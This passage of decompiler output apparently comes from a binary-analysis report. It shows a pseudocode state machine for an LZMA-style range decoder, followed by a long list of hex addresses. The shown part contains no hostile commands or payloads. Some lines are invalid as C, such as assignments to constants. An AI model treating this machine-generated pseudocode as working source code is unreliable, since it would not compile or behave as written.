                                                                                                                          									goto L46;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L54:
                                                                                                                          							_t173 = __ebp - 0x34;
                                                                                                                          							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                          							__eflags =  *_t173;
                                                                                                                          							goto L55;
                                                                                                                          						case 0xf:
                                                                                                                          							L58:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0xf;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t203 = __ebp - 0x70;
                                                                                                                          							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t203;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							L60:
                                                                                                                          							__eflags = __ebx - 0x100;
                                                                                                                          							if(__ebx >= 0x100) {
                                                                                                                          								L55:
                                                                                                                          								__al =  *(__ebp - 0x44);
                                                                                                                          								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                          								goto L56;
                                                                                                                          							}
                                                                                                                          							L61:
                                                                                                                          							__eax =  *(__ebp - 0x58);
                                                                                                                          							__edx = __ebx + __ebx;
                                                                                                                          							__ecx =  *(__ebp - 0x10);
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								_t217 = __edx + 1; // 0x1
                                                                                                                          								__ebx = _t217;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          							 *(__ebp - 0x44) = __ebx;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								goto L60;
                                                                                                                          							} else {
                                                                                                                          								goto L58;
                                                                                                                          							}
                                                                                                                          						case 0x10:
                                                                                                                          							L109:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x10;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t365 = __ebp - 0x70;
                                                                                                                          							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t365;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							goto L111;
                                                                                                                          						case 0x11:
                                                                                                                          							goto L69;
                                                                                                                          						case 0x12:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								__eax =  *(__ebp - 0x58);
                                                                                                                          								 *(__ebp - 0x84) = 0x13;
                                                                                                                          								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                          								goto L132;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x4c);
                                                                                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          							__eflags = __eax;
                                                                                                                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                          							goto L130;
                                                                                                                          						case 0x13:
                                                                                                                          							__eflags =  *(__ebp - 0x40);
                                                                                                                          							if( *(__ebp - 0x40) != 0) {
                                                                                                                          								_t469 = __ebp - 0x58;
                                                                                                                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                          								__eflags =  *_t469;
                                                                                                                          								 *(__ebp - 0x30) = 0x10;
                                                                                                                          								 *(__ebp - 0x40) = 8;
                                                                                                                          								L144:
                                                                                                                          								 *(__ebp - 0x7c) = 0x14;
                                                                                                                          								goto L145;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x4c);
                                                                                                                          							__ecx =  *(__ebp - 0x58);
                                                                                                                          							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                          							 *(__ebp - 0x30) = 8;
                                                                                                                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                          							L130:
                                                                                                                          							 *(__ebp - 0x58) = __eax;
                                                                                                                          							 *(__ebp - 0x40) = 3;
                                                                                                                          							goto L144;
                                                                                                                          						case 0x14:
                                                                                                                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                          							__eax =  *(__ebp - 0x80);
                                                                                                                          							goto L140;
                                                                                                                          						case 0x15:
                                                                                                                          							__eax = 0;
                                                                                                                          							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          							__al = __al & 0x000000fd;
                                                                                                                          							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                          							goto L120;
                                                                                                                          						case 0x16:
                                                                                                                          							__eax =  *(__ebp - 0x30);
                                                                                                                          							__eflags = __eax - 4;
                                                                                                                          							if(__eax >= 4) {
                                                                                                                          								_push(3);
                                                                                                                          								_pop(__eax);
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 4);
                                                                                                                          							 *(__ebp - 0x40) = 6;
                                                                                                                          							__eax = __eax << 7;
                                                                                                                          							 *(__ebp - 0x7c) = 0x19;
                                                                                                                          							 *(__ebp - 0x58) = __eax;
                                                                                                                          							goto L145;
                                                                                                                          						case 0x17:
                                                                                                                          							L145:
                                                                                                                          							__eax =  *(__ebp - 0x40);
                                                                                                                          							 *(__ebp - 0x50) = 1;
                                                                                                                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                          							goto L149;
                                                                                                                          						case 0x18:
                                                                                                                          							L146:
                                                                                                                          							__eflags =  *(__ebp - 0x6c);
                                                                                                                          							if( *(__ebp - 0x6c) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x18;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x70);
                                                                                                                          							__eax =  *(__ebp - 0xc);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							_t484 = __ebp - 0x70;
                                                                                                                          							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                          							__eflags =  *_t484;
                                                                                                                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                          							L148:
                                                                                                                          							_t487 = __ebp - 0x48;
                                                                                                                          							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                          							__eflags =  *_t487;
                                                                                                                          							L149:
                                                                                                                          							__eflags =  *(__ebp - 0x48);
                                                                                                                          							if( *(__ebp - 0x48) <= 0) {
                                                                                                                          								__ecx =  *(__ebp - 0x40);
                                                                                                                          								__ebx =  *(__ebp - 0x50);
                                                                                                                          								0 = 1;
                                                                                                                          								__eax = 1 << __cl;
                                                                                                                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                          								__eax =  *(__ebp - 0x7c);
                                                                                                                          								 *(__ebp - 0x44) = __ebx;
                                                                                                                          								goto L140;
                                                                                                                          							}
                                                                                                                          							__eax =  *(__ebp - 0x50);
                                                                                                                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          							__eax =  *(__ebp - 0x58);
                                                                                                                          							__esi = __edx + __eax;
                                                                                                                          							 *(__ebp - 0x54) = __esi;
                                                                                                                          							__ax =  *__esi;
                                                                                                                          							__edi = __ax & 0x0000ffff;
                                                                                                                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                          							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                          							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                          								__cx = __ax;
                                                                                                                          								__cx = __ax >> 5;
                                                                                                                          								__eax = __eax - __ecx;
                                                                                                                          								__edx = __edx + 1;
                                                                                                                          								__eflags = __edx;
                                                                                                                          								 *__esi = __ax;
                                                                                                                          								 *(__ebp - 0x50) = __edx;
                                                                                                                          							} else {
                                                                                                                          								 *(__ebp - 0x10) = __ecx;
                                                                                                                          								0x800 = 0x800 - __edi;
                                                                                                                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          								 *__esi = __cx;
                                                                                                                          							}
                                                                                                                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          								goto L148;
                                                                                                                          							} else {
                                                                                                                          								goto L146;
                                                                                                                          							}
                                                                                                                          						case 0x19:
                                                                                                                          							__eflags = __ebx - 4;
                                                                                                                          							if(__ebx < 4) {
                                                                                                                          								 *(__ebp - 0x2c) = __ebx;
                                                                                                                          								L119:
                                                                                                                          								_t393 = __ebp - 0x2c;
                                                                                                                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                          								__eflags =  *_t393;
                                                                                                                          								L120:
                                                                                                                          								__eax =  *(__ebp - 0x2c);
                                                                                                                          								__eflags = __eax;
                                                                                                                          								if(__eax == 0) {
                                                                                                                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                          									goto L170;
                                                                                                                          								}
                                                                                                                          								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                          								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                          									goto L171;
                                                                                                                          								}
                                                                                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                          								__eax =  *(__ebp - 0x30);
                                                                                                                          								_t400 = __ebp - 0x60;
                                                                                                                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                          								__eflags =  *_t400;
                                                                                                                          								goto L123;
                                                                                                                          							}
                                                                                                                          							__ecx = __ebx;
                                                                                                                          							__eax = __ebx;
                                                                                                                          							__ecx = __ebx >> 1;
                                                                                                                          							__eax = __ebx & 0x00000001;
                                                                                                                          							__ecx = (__ebx >> 1) - 1;
                                                                                                                          							__al = __al | 0x00000002;
                                                                                                                          							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                          							__eflags = __ebx - 0xe;
                                                                                                                          							 *(__ebp - 0x2c) = __eax;
                                                                                                                          							if(__ebx >= 0xe) {
                                                                                                                          								__ebx = 0;
                                                                                                                          								 *(__ebp - 0x48) = __ecx;
                                                                                                                          								L102:
                                                                                                                          								__eflags =  *(__ebp - 0x48);
                                                                                                                          								if( *(__ebp - 0x48) <= 0) {
                                                                                                                          									__eax = __eax + __ebx;
                                                                                                                          									 *(__ebp - 0x40) = 4;
                                                                                                                          									 *(__ebp - 0x2c) = __eax;
                                                                                                                          									__eax =  *(__ebp - 4);
                                                                                                                          									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                          									__eflags = __eax;
                                                                                                                          									L108:
                                                                                                                          									__ebx = 0;
                                                                                                                          									 *(__ebp - 0x58) = __eax;
                                                                                                                          									 *(__ebp - 0x50) = 1;
                                                                                                                          									 *(__ebp - 0x44) = 0;
                                                                                                                          									 *(__ebp - 0x48) = 0;
                                                                                                                          									L112:
                                                                                                                          									__eax =  *(__ebp - 0x40);
                                                                                                                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                          										_t391 = __ebp - 0x2c;
                                                                                                                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                          										__eflags =  *_t391;
                                                                                                                          										goto L119;
                                                                                                                          									}
                                                                                                                          									__eax =  *(__ebp - 0x50);
                                                                                                                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                          									__eax =  *(__ebp - 0x58);
                                                                                                                          									__esi = __edi + __eax;
                                                                                                                          									 *(__ebp - 0x54) = __esi;
                                                                                                                          									__ax =  *__esi;
                                                                                                                          									__ecx = __ax & 0x0000ffff;
                                                                                                                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                          									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                          									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                          										__ecx = 0;
                                                                                                                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                          										__ecx = 1;
                                                                                                                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                          										__ebx = 1;
                                                                                                                          										__ecx =  *(__ebp - 0x48);
                                                                                                                          										__ebx = 1 << __cl;
                                                                                                                          										__ecx = 1 << __cl;
                                                                                                                          										__ebx =  *(__ebp - 0x44);
                                                                                                                          										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                          										__cx = __ax;
                                                                                                                          										__cx = __ax >> 5;
                                                                                                                          										__eax = __eax - __ecx;
                                                                                                                          										__edi = __edi + 1;
                                                                                                                          										__eflags = __edi;
                                                                                                                          										 *(__ebp - 0x44) = __ebx;
                                                                                                                          										 *__esi = __ax;
                                                                                                                          										 *(__ebp - 0x50) = __edi;
                                                                                                                          									} else {
                                                                                                                          										 *(__ebp - 0x10) = __edx;
                                                                                                                          										0x800 = 0x800 - __ecx;
                                                                                                                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                          										 *__esi = __dx;
                                                                                                                          									}
                                                                                                                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          										L111:
                                                                                                                          										_t368 = __ebp - 0x48;
                                                                                                                          										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                          										__eflags =  *_t368;
                                                                                                                          										goto L112;
                                                                                                                          									} else {
                                                                                                                          										goto L109;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								__ecx =  *(__ebp - 0xc);
                                                                                                                          								__ebx = __ebx + __ebx;
                                                                                                                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          								 *(__ebp - 0x44) = __ebx;
                                                                                                                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                          									__ecx =  *(__ebp - 0x10);
                                                                                                                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                          									__ebx = __ebx | 0x00000001;
                                                                                                                          									__eflags = __ebx;
                                                                                                                          									 *(__ebp - 0x44) = __ebx;
                                                                                                                          								}
                                                                                                                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                          								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                          									L101:
                                                                                                                          									_t338 = __ebp - 0x48;
                                                                                                                          									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                          									__eflags =  *_t338;
                                                                                                                          									goto L102;
                                                                                                                          								} else {
                                                                                                                          									goto L99;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__edx =  *(__ebp - 4);
                                                                                                                          							__eax = __eax - __ebx;
                                                                                                                          							 *(__ebp - 0x40) = __ecx;
                                                                                                                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                          							goto L108;
                                                                                                                          						case 0x1a:
                                                                                                                          							L56:
                                                                                                                          							__eflags =  *(__ebp - 0x64);
                                                                                                                          							if( *(__ebp - 0x64) == 0) {
                                                                                                                          								 *(__ebp - 0x88) = 0x1a;
                                                                                                                          								goto L170;
                                                                                                                          							}
                                                                                                                          							__ecx =  *(__ebp - 0x68);
                                                                                                                          							__al =  *(__ebp - 0x5c);
                                                                                                                          							__edx =  *(__ebp - 8);
                                                                                                                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          							 *( *(__ebp - 0x68)) = __al;
                                                                                                                          							__ecx =  *(__ebp - 0x14);
                                                                                                                          							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                          							__eax = __ecx + 1;
                                                                                                                          							__edx = 0;
                                                                                                                          							_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                          							__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          							__edx = _t192;
                                                                                                                          							goto L79;
                                                                                                                          						case 0x1b:
                                                                                                                          							goto L75;
                                                                                                                          						case 0x1c:
                                                                                                                          							while(1) {
                                                                                                                          								L123:
                                                                                                                          								__eflags =  *(__ebp - 0x64);
                                                                                                                          								if( *(__ebp - 0x64) == 0) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								__eax =  *(__ebp - 0x14);
                                                                                                                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                          								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                          								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                          									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                          									__eflags = __eax;
                                                                                                                          								}
                                                                                                                          								__edx =  *(__ebp - 8);
                                                                                                                          								__cl =  *(__eax + __edx);
                                                                                                                          								__eax =  *(__ebp - 0x14);
                                                                                                                          								 *(__ebp - 0x5c) = __cl;
                                                                                                                          								 *(__eax + __edx) = __cl;
                                                                                                                          								__eax = __eax + 1;
                                                                                                                          								__edx = 0;
                                                                                                                          								_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                          								__eax = __eax /  *(__ebp - 0x74);
                                                                                                                          								__edx = _t414;
                                                                                                                          								__eax =  *(__ebp - 0x68);
                                                                                                                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                          								__eflags =  *(__ebp - 0x30);
                                                                                                                          								 *( *(__ebp - 0x68)) = __cl;
                                                                                                                          								 *(__ebp - 0x14) = _t414;
                                                                                                                          								if( *(__ebp - 0x30) > 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L80;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							 *(__ebp - 0x88) = 0x1c;
                                                                                                                          							goto L170;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}













                                                                                                                          0x00405f19
                                                                                                                          0x00405f43
                                                                                                                          0x00405f49
                                                                                                                          0x00405f50
                                                                                                                          0x00000000
                                                                                                                          0x00405f50
                                                                                                                          0x00405f1f
                                                                                                                          0x00405f22
                                                                                                                          0x00405f27
                                                                                                                          0x00405f27
                                                                                                                          0x00405f32
                                                                                                                          0x00405f3a
                                                                                                                          0x00405f3d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f82
                                                                                                                          0x00405f88
                                                                                                                          0x00405f8b
                                                                                                                          0x00405f98
                                                                                                                          0x00405fa0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405f57
                                                                                                                          0x00405f57
                                                                                                                          0x00405f5b
                                                                                                                          0x004067a6
                                                                                                                          0x00000000
                                                                                                                          0x004067a6
                                                                                                                          0x00405f67
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f72
                                                                                                                          0x00405f75
                                                                                                                          0x00405f78
                                                                                                                          0x00405f7b
                                                                                                                          0x00405f80
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405fa8
                                                                                                                          0x00405faa
                                                                                                                          0x00405fad
                                                                                                                          0x0040601e
                                                                                                                          0x00406021
                                                                                                                          0x00406024
                                                                                                                          0x0040602b
                                                                                                                          0x00406035
                                                                                                                          0x00000000
                                                                                                                          0x00406035
                                                                                                                          0x00405faf
                                                                                                                          0x00405fb3
                                                                                                                          0x00405fb6
                                                                                                                          0x00405fb8
                                                                                                                          0x00405fbb
                                                                                                                          0x00405fbe
                                                                                                                          0x00405fc0
                                                                                                                          0x00405fc3
                                                                                                                          0x00405fc5
                                                                                                                          0x00405fca
                                                                                                                          0x00405fcd
                                                                                                                          0x00405fd0
                                                                                                                          0x00405fd4
                                                                                                                          0x00405fdb
                                                                                                                          0x00405fde
                                                                                                                          0x00405fe5
                                                                                                                          0x00405fe9
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405ff1
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405feb
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405fe0
                                                                                                                          0x00405ff5
                                                                                                                          0x00405ff8
                                                                                                                          0x00406016
                                                                                                                          0x00406018
                                                                                                                          0x00000000
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffa
                                                                                                                          0x00405ffd
                                                                                                                          0x00406000
                                                                                                                          0x00406003
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406005
                                                                                                                          0x00406008
                                                                                                                          0x0040600b
                                                                                                                          0x0040600d
                                                                                                                          0x0040600e
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406011
                                                                                                                          0x00000000
                                                                                                                          0x00406247
                                                                                                                          0x0040624b
                                                                                                                          0x00406269
                                                                                                                          0x0040626c
                                                                                                                          0x00406273
                                                                                                                          0x00406276
                                                                                                                          0x00406279
                                                                                                                          0x0040627c
                                                                                                                          0x0040627f
                                                                                                                          0x00406282
                                                                                                                          0x00406284
                                                                                                                          0x0040628b
                                                                                                                          0x0040628c
                                                                                                                          0x0040628e
                                                                                                                          0x00406291
                                                                                                                          0x00406294
                                                                                                                          0x00406297
                                                                                                                          0x00406297
                                                                                                                          0x0040629c
                                                                                                                          0x00000000
                                                                                                                          0x0040629c
                                                                                                                          0x0040624d
                                                                                                                          0x00406250
                                                                                                                          0x00406253
                                                                                                                          0x0040625d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004062b1
                                                                                                                          0x004062b5
                                                                                                                          0x004062d8
                                                                                                                          0x004062db
                                                                                                                          0x004062de
                                                                                                                          0x004062e8
                                                                                                                          0x004062b7
                                                                                                                          0x004062b7
                                                                                                                          0x004062ba
                                                                                                                          0x004062bd
                                                                                                                          0x004062c0
                                                                                                                          0x004062cd
                                                                                                                          0x004062d0
                                                                                                                          0x004062d0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406365
                                                                                                                          0x00406369
                                                                                                                          0x00406370
                                                                                                                          0x00406373
                                                                                                                          0x00406376
                                                                                                                          0x00406380
                                                                                                                          0x00000000
                                                                                                                          0x00406380
                                                                                                                          0x0040636b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040638c
                                                                                                                          0x00406390
                                                                                                                          0x00406397
                                                                                                                          0x0040639a
                                                                                                                          0x0040639d
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x00406392
                                                                                                                          0x004063a0
                                                                                                                          0x004063a3
                                                                                                                          0x004063a6
                                                                                                                          0x004063a6
                                                                                                                          0x004063a9
                                                                                                                          0x004063ac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040644c
                                                                                                                          0x0040644c
                                                                                                                          0x00406450
                                                                                                                          0x004067ee
                                                                                                                          0x00000000
                                                                                                                          0x004067ee
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406460
                                                                                                                          0x00406463
                                                                                                                          0x00406469
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646b
                                                                                                                          0x0040646e
                                                                                                                          0x00406471
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406041
                                                                                                                          0x00406041
                                                                                                                          0x00406045
                                                                                                                          0x004067b2
                                                                                                                          0x00000000
                                                                                                                          0x004067b2
                                                                                                                          0x0040604b
                                                                                                                          0x0040604e
                                                                                                                          0x00406051
                                                                                                                          0x00406055
                                                                                                                          0x00406058
                                                                                                                          0x0040605e
                                                                                                                          0x00406060
                                                                                                                          0x00406060
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x00406707
                                                                                                                          0x0040670a
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x0040670d
                                                                                                                          0x00406710
                                                                                                                          0x00406710
                                                                                                                          0x00406714
                                                                                                                          0x00406774
                                                                                                                          0x00406777
                                                                                                                          0x0040677c
                                                                                                                          0x0040677d
                                                                                                                          0x0040677f
                                                                                                                          0x00406781
                                                                                                                          0x00406784
                                                                                                                          0x00000000
                                                                                                                          0x00406784
                                                                                                                          0x00406716
                                                                                                                          0x0040671c
                                                                                                                          0x0040671f
                                                                                                                          0x00406722
                                                                                                                          0x00406725
                                                                                                                          0x00406728
                                                                                                                          0x0040672b
                                                                                                                          0x0040672e
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x00406750
                                                                                                                          0x00406753
                                                                                                                          0x00406756
                                                                                                                          0x00406759
                                                                                                                          0x0040675d
                                                                                                                          0x0040675f
                                                                                                                          0x0040675f
                                                                                                                          0x00406760
                                                                                                                          0x00406763
                                                                                                                          0x00406739
                                                                                                                          0x00406739
                                                                                                                          0x00406741
                                                                                                                          0x00406746
                                                                                                                          0x00406748
                                                                                                                          0x0040674b
                                                                                                                          0x0040674b
                                                                                                                          0x00406766
                                                                                                                          0x0040676d
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040676f
                                                                                                                          0x00000000
                                                                                                                          0x0040640b
                                                                                                                          0x0040640e
                                                                                                                          0x00406444
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406574
                                                                                                                          0x00406577
                                                                                                                          0x00406577
                                                                                                                          0x0040657a
                                                                                                                          0x0040657c
                                                                                                                          0x00406806
                                                                                                                          0x00000000
                                                                                                                          0x00406806
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040658b
                                                                                                                          0x0040658f
                                                                                                                          0x00406592
                                                                                                                          0x00406592
                                                                                                                          0x00406592
